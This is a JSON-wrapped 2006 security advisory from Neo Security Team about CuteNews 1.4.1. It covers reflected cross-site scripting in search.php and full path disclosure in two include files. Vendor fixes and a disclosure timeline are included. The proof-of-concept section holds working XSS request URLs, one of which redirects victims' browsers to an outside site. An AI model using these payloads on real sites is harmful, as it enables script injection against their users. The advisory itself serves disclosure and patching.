{"type": "packetstorm", "published": "2006-05-06T00:00:00", "reporter": "K4P0", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "9b88ad468ac13c0da5518296e46ed686"}, {"key": "modified", "hash": "209ec05dc6564f3fc7e2dedb1e607842"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "209ec05dc6564f3fc7e2dedb1e607842"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "f82cc20969e3585996cf5b4589e2dd4d"}, {"key": "sourceData", "hash": "f5407e4d5dd3c0f845add4145e4b58e4"}, {"key": "sourceHref", "hash": "a3858426458aa5b24184478dd8e4926c"}, {"key": "title", "hash": "62d002112dd5414c4373532c10569e79"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`/* \n--------------------------------------------------------------- \n[N]eo [S]ecurity [T]eam [NST]\u00ae Advisory #20 \n--------------------------------------------------------------- \nProgram : CuteNews 1.4.1 \nHomepage: http://www.cutephp.com \nVulnerable Versions: CuteNews 1.4.1 & lower ones \nRisk: Medium! \nImpact: Cross Site Scripting, Full Path Disclosure \n \n-> CuteNews 1.4.1 Multiple vulnerabilities <- \n--------------------------------------------------------------- \n \n- Description \n--------------------------------------------------------------- \nCute news is a powerful and easy for using news management system \nthat use flat files to store its database. It supports comments and \narchives that can be organized by months. \n \n- Tested \n--------------------------------------------------------------- \nTested in localhost & many remote CuteNews \n \n- Bug \n--------------------------------------------------------------- \n1 - [ Cross Site Scripting ] \nThere're serveral XSS bugs in 'search.php' file, this is caused because \nthe script doesn't filter right three _GET variables that're used in \nsome fields of the web page. \n \nTo be short, here is the vulnerable code: \n \n<div align=\"center\"> \n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\"> \n<tr> \n<td><table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"> \n<td width=\"100%\"> \n<p align=\"right\">News <input type=text value=\"$story\" \nname=story size=\"24\"> \n</table></td> \n</tr> \n<tr> \n<td> \n \n<div id='advanced' style='display:none;z-index:1;'> \n<table width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"> \n<td width=\"100%\" align=\"right\"> \n<p align=\"right\">Title&nbsp;<input type=text value=\"$title\" \nname=title size=\"24\"> \n<tr> \n<td width=\"100%\" align=\"right\">Author&nbsp;<input type=text value=\"$user\" \nname=user size=\"24\"> \n</tr> \n \nThose variables where `extracted' (extract()) from the global variables, \nbut the problem itself is that they're not filtered. So here we can see \nthat the following variables allow html injection arbitrary code: $user, \n$story, $title. \n \n2 - [ Full Path Disclosure ] \nIn /inc/ folder, there're 2 .php files that don't check if they're been \ncalled directly. \n \n- Proof of concept \n--------------------------------------------------------------- \n1 - [ Cross site scripting ] \nAs PoC, here you've some intresting results: \n \n- search.php?dosearch=yes&story=%22%3E%3Cscript%3Ealert \n%28%22NST+PoC+by+K4P0%22%29%3B%3C%2Fscript%3E&title=& \nuser=&from_date_day=&from_date_month=&from_date_year=& \nto_date_day=&to_date_month=&to_date_year= \n \n- search.php?dosearch=yes&title=%22%3E%3Cscript%3Ealert \n(%22NST%20PoC%20by%20K4P0%22 );%3C/script%3E&user= \n&from_date_day=&from_date_month=&from_date_year= \n&to_date_day =&to_date_month=&to_date_year= \n \n- search.php?dosearch=yes&story=K4P0&user=%22%3E%3Cscript%3 \nEalert(%22NST%20PoC%20by%20K4P0%22);%3C/script%3E&from_date_day= \n&from_date_month=&from_date_year=&to_date_day=&to_date_month= \n&to_date_year= \n \n- search.php?dosearch=yes&title=\"><script>window.location= \n'http://www.neosecurityteam.net/';</script>&user=&from_date_day= \n&from_date_month=&from_date_year=&to_date_day=&to_date_month= \n&to_date_year= \n \nNote: magic_quotes_gpc must be off \n \n2 - [ Full path disclosure ] \nwww.victim.com/cutenews/inc/show.inc.php \nwww.victim.com/cutenews/inc/functions.inc.php \n \n- Solutions \n--------------------------------------------------------------- \nIt's highly recommended to uptdate your CuteNews, but if you want to \npatch it yourself take a look at the following recommendations: \n \n1 - [ Cross site scripting ] \nSet magic_quotes_gpc ON in your php.ini, but as this cannot be possible \nin serveral servers (hosting stuff), the real solution is to filter \nthese variables. \n \nGo to line 25 and change it to this: \n \n// Show Search Form \n$user = htmlentities($user); \n$story = htmlentities($story); \n$title = htmlentities($title); \necho<<<HTML \n<script language='javascript' type=\"text/javascript\"> \nfunction mySelect(form){ \nform.select(); \n} \nfunction ShowOrHide(d1, d2) { \nif (d1 != '') DoDiv(d1); \nif (d2 != '') DoDiv(d2); \n} \n \n2 - [ Full Path Disclosure ] \nIn the first line of 'functions.inc.php' write: \nif (eregi('functions.inc.php', $_SERVER['PHP_SELF'])) \ndie('You are not allowed to see this page directly'); \n \nIn the first line of 'shows.inc.php' write: \nif (eregi('shows.inc.php', $_SERVER['PHP_SELF'])) \ndie('You are not allowed to see this page directly'); \n \n- Timeline \n--------------------------------------------------------------- \n03/03/2006 - Vendor was notified about security issues \n*** - Vendor did not reply but released a newer version. \n \n- Discalimer \n--------------------------------------------------------------- \nYOU are the only RESPONSALBE of any DAMAGE of above techniques \ncould cause or any code you have made based in this advisory, \nall ideas, proof of concepts, solutions, descriptions were made \nonly for EDUCATIONAL propuses, use all above information at your \nown risk. \n \n- References \n--------------------------------------------------------------- \nhttp://NeoSecurityTeam.net/index.php?action=advisories&id=20 \nhttp://NeoSecurityTeam.net/advisories/Advisory-20.txt \n \n- Credits \n--------------------------------------------------------------- \nDiscovered by k4p0 -> k4p0k4p0[at]hotmail[dot]com \n \n[N]eo [S]ecurity [T]eam [NST]\u00ae - http://NeoSecurityTeam.net/ \n \nIrc.FullNnetwork.org #nst \nQuestions? (Eng | Spa) -> http://NeoSecurityTeam.net/foro/ \n \n- Greets \n--------------------------------------------------------------- \nPaisterist \nHaCkZaTaN \nLink \nDaemon21 \nerg0t \nNST Comunity! \n \n \n@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@ \n'@@@@@''@@'@@@''''''''@@''@@@''@@ \n'@@'@@@@@@''@@@@@@@@@'''''@@@'''' \n'@@'''@@@@'''''''''@@@''''@@@'''' \n@@@@''''@@'@@@@@@@@@@''''@@@@@''' \n*/ \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:23:08", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/46119/neo-Advisory-20.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/46119/neo-Advisory-20.txt", "title": "neo-Advisory-20.txt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:08"}, "vulnersScore": 7.5}, "references": [], "id": "PACKETSTORM:46119", "hash": "36ad6b98a519b607f90e95ede6593acf04c0c1997b366e9b386b8aba9ddcbfe3", "edition": 1, "cvelist": [], "modified": "2006-05-06T00:00:00", "description": ""}

{}